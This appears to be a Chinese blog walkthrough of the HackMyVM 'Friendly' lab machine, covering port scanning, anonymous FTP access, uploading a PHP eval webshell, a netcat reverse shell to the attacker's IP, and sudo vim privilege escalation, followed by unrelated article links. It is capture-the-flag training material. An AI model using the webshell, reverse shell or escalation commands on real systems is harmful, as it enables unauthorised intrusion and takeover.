friendly靶机渗透

笔记于2025/12/1

参照HakcMyVM/Friendly.md at master · pencek/HakcMyVM · GitHub进行复现

靶机介绍:

FTP服务匿名、WEBSHLL上传、vim提权

攻击机IP:192.168.161.139

靶机IP:192.168.161.140

端口扫描

得知开放FTP服务和WEB应用协议

复制代码
nmap -p- 192.168.161.140

详细信息检测

有匿名账户

复制代码
nmap -p21,80 -A 192.168.161.140

WEB渗透测试

网站首页

目录扫描

只有index.html页面

复制代码
gobuster dir -w /usr/share/wordlists/dirbuster-list-2.3-medium.txt -u http://192.168.161.140/ -x php,html,txt -e

FTP服务

复制代码
ftp 192.168.161.140 
#输入账户anonymous,匿名账户没有密码直接回车,继续输入 
ls -al 
#发现跟目录扫描出来一个框架

上传webshell

复制代码
<?php eval($_POST['x']);?>

上传

复制代码
put rce.php

攻击机开启监听

蚁剑连接webshell,终端执行命令

复制代码
nc -e /bin/bash 192.168.161.139 6666

内网渗透

拿到user.txt

信息收集

复制代码
sudo -l

内网提权

复制代码
https://gtfobins.github.io/gtfobins/vim/#sudo

执行提权命令

复制代码
sudo /usr/bin/vim -c '!/bin/bash'

拿到root.txt,这里的/root/root.txt是假的flag

复制代码
find / -type f -name 'root.txt'

渗透测试收获

FTP匿名登录体验和FTP服务基本命令、新的提权vim提权

相关推荐
RainCity2 天前
Java Swing 自定义组件库分享(十二)
java·笔记·后端
Flynt4 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab9 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
LinXunFeng10 天前
Obsidian - 使用 Share Note 分享笔记并自部署
前端·笔记·github
两个人的幸福10 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
Aphasia31112 天前
VPN 与内网穿透
安全
BingoGo12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户30745969820713 天前
PHP 扩展——从入门到理解
php
Mr_愚人派13 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全